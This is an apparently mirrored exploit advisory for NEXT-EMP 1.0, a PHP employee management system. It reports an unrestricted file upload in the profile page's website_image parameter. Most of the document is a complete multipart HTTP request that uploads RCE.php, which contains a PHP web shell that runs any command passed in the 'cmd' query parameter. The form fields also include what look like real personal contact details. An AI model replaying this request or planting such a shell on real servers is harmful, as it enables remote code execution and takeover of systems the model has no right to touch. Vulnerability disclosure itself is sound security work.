Exploit for NEXT-EMP 1.0 Shell Upload

## https://sploitus.com/exploit?id=PACKETSTORM:188914
# Titles: NEXT-EMP v1.0-Copyright © 2024. All rights reserved.
    ### File Upload-FU and Remote Code Execution-RCE Vulnerabilities
    # Author: nu11secur1ty
    # Date: 01/29/2025
    # Vendor: https://www.mayurik.com/
    # Software:
    https://www.mayurik.com/source-code/P8337/complete-employee-management-system-project-in-php-free-download
    # Reference: https://portswigger.net/web-security/file-upload |
    https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
    
    ## Description:
    The website_image parameter in profile app is vulnerable for File Upload
    and then Remote Code Execution without any execution permission sanitizing.
    The attacker can upload absolutely DANGEROUS files on that server and he
    can destroy it with one click!
    
    STATUS: HIGH-CRITICAL Vulnerability
    
    
    [+]Exploit:
    - RCE Exploit:
    
    ```RCE
    POST /pwnedhost/_hr_soft/admin/profile.php HTTP/1.1
    Host: 192.168.100.45
    Cookie: PHPSESSID=slraqmcub88jc9mdbc968fop7l
    Content-Length: 1325
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Not A(Brand";v="8", "Chromium";v="132"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Windows"
    Accept-Language: en-US,en;q=0.9
    Origin: https://192.168.100.45
    Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundaryHzTVdFgDMQYGBepP
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
    (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: https://192.168.100.45/pwnedhost/_hr_soft/admin/profile.php
    Accept-Encoding: gzip, deflate, br
    Priority: u=0, i
    Connection: keep-alive
    
    ------WebKitFormBoundaryHzTVdFgDMQYGBepP
    Content-Disposition: form-data; name="old_website_image"
    
    stupid.png
    ------WebKitFormBoundaryHzTVdFgDMQYGBepP
    Content-Disposition: form-data; name="website_image"; filename="RCE.php"
    Content-Type: application/octet-stream
    
    <?php echo shell_exec($_GET["cmd"]); ?>
    
    ------WebKitFormBoundaryHzTVdFgDMQYGBepP
    Content-Disposition: form-data; name="fname"
    
    Mayuri
    ------WebKitFormBoundaryHzTVdFgDMQYGBepP
    Content-Disposition: form-data; name="lname"
    
    K
    ------WebKitFormBoundaryHzTVdFgDMQYGBepP
    Content-Disposition: form-data; name="email"
    
    mayuri.infospace@gmail.com
    ------WebKitFormBoundaryHzTVdFgDMQYGBepP
    Content-Disposition: form-data; name="gender"
    
    Male
    ------WebKitFormBoundaryHzTVdFgDMQYGBepP
    Content-Disposition: form-data; name="contact"
    
    9529230459
    ------WebKitFormBoundaryHzTVdFgDMQYGBepP
    Content-Disposition: form-data; name="username"
    
    mayurik
    ------WebKitFormBoundaryHzTVdFgDMQYGBepP
    Content-Disposition: form-data; name="address"
    
    India
    
    
    ------WebKitFormBoundaryHzTVdFgDMQYGBepP
    Content-Disposition: form-data; name="update"
    
    
    ------WebKitFormBoundaryHzTVdFgDMQYGBepP--
    
    
    ```
    
    # Reproduce:
    [href](https://www.patreon.com/posts/nextemployee-1-0-121020861)
    [more](https://www.nu11secur1ty.com/2025/01/nextemployee-10-rce.html)
    
    
    ## Time spent:
    00:37:00